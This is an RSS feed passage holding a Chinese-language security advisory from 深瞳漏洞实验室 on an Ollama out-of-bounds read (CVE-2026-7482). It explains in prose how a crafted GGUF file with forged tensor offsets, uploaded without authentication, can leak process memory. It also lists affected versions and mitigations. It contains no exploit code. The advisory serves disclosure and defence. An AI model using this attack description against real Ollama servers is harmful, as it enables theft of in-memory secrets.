rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501447&amp;idx=1&amp;sn=0f80ca1d770f552e908dbf28df485e07&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第15期（4月6日-4月12日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第15期（4月6日-4月12日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501406&amp;idx=1&amp;sn=f2e30d65d7bacb2eae51bde67d6b1ed8&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第14期（3月30日-4月5日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第14期（3月30日-4月5日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501384&amp;idx=1&amp;sn=8ab76f1f0a1e754606422e898e1612d5&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第13期（3月23日-3月29日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第13期（3月23日-3月29日）</a></span></span></span></span></span></span></span></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=0ba090f4&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525526%26idx%3D2%26sn%3Dc8961b713f0d04f93938d103465639a7">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 May 2026 16:49:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Ollama 越界读取漏洞(CVE-2026-7482)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525496&amp;idx=1&amp;sn=855b158f3eedb70985dfb85471828ee9</link>
      <description>2026年5月6日，深瞳漏洞实验室监测到一则Ollama组件存在越界读取漏洞的信息，漏洞编号：CVE-2026-7482，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-05-06 21:45</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f25f3c77&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxSNkJPRbHkPiatUKqQqKE9FMoIWmufWlhOP4y7qLuianGsGcPapsWEHrEo0SkWUsXIJNhfAbPI0fsVU8DZNBS40Nom66icwCXcMb8%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年5月6日，深瞳漏洞实验室监测到一则Ollama组件存在越界读取漏洞的信息，漏洞编号：CVE-2026-7482，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041829" src="https://wechat2rss.xlab.app/img-proxy/?k=8ce001a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRPzaDNMYicibfGdvIW54LiaBKNhNn06KTUq1dR1u2oXsNaTYicFkDAKeAcaykcOM4Dcg8PcLaJjhy1FicsvnqIzlL8gMB2kIicickices%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ollama 越界读取漏洞(CVE-2026-7482)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ollama</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ollama &lt; 0.17.1</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">越界读取</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：无需用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：容易，无需授权即可读取内存中敏感信息。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，可读取内存中敏感信息。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041830" src="https://wechat2rss.xlab.app/img-proxy/?k=cea89b81&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTN4qKGrNA0ZvxHHMzhoI4fu61GmaQiaeNydrlicGy0icOewWDVOJ2ia4fVEpN5I6nzNPurncXl0IQ9Dc8FNvyoeKl1ibaf04bPwQDg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ollama 是一个专注于本地部署大型语言模型的工具，通过提供便捷的模型管理、丰富的预建模型库、跨平台支持以及灵活的自定义选项，使得开发者和研究人员能够在本地环境中高效利用大型语言模型进行各种自然语言处理任务，而无需依赖云服务或复杂的基础设施设置。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041827" src="https://wechat2rss.xlab.app/img-proxy/?k=e9bc9cec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSOH9azhicFGxJorSAwySQRXhiamyFt7icBlNFEibqib4tz7vXnMA4icppgQ0bAQfYw4GADgCOUaia0t8kWG2DpAK9bBIqoF9Reg5334w%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年5月6日，深瞳漏洞实验室监测到一则Ollama组件存在越界读取漏洞的信息，漏洞编号：CVE-2026-7482，漏洞威胁等级：高危。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ollama 服务在解析处理 GGUF 格式模型文件时，未对文件声明的张量偏移量与大小进行边界校验，直接将其作为内存读取的依据，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">攻击者可构造恶意 GGUF 文件，通过伪造超出实际文件范围与合法内存区间的偏移及长度值，触发堆缓冲区越界读取，并且相关模型创建接口默认缺乏访问认证限制，未授权远程攻击者即可上传恶意文件利用该缺陷读取进程内存中的敏感信息。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的Ollama版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ollama &lt; 0.17.1</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041826" src="https://wechat2rss.xlab.app/img-proxy/?k=c3de4325&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSd8A5OQ3tTWCkaexgAslJjjRXMmldvniaNTY0VArIQVjnq0quK0ny0gea84ggiaoOlKju4cadlLFJdibcUnRrMY2QM6Iy0l6ZhCg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将Ollama更新到最新版本。</span><span leaf=""><br/></span><span leaf="">下载链接：<a href="https://github.com/ollama/ollama/releases/tag/v0.17.1" target="_blank">https://github.com/ollama/ollama/releases/tag/v0.17.1</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041828" src="https://wechat2rss.xlab.app/img-proxy/?k=7ce63e08&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRnzOtFQicicRs4lbv4K48lgEbKb9CR9jGuACN4GUFdra1vNtoVsqKMMeAGtlO58fkiaRR6VpH31ib5uBTzYYJUej1qmoICZFwYgww%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041831" src="https://wechat2rss.xlab.app/img-proxy/?k=59971d69&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTbd8gyBRsXiakn9wz5nibD8SZA3QibgtMVNYCFELvmesuuM9j0tFgE6QdcIQzwDg94bgRuHBZ2WiboKIsoyDtyeO2icZtibt0nbFibsw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: 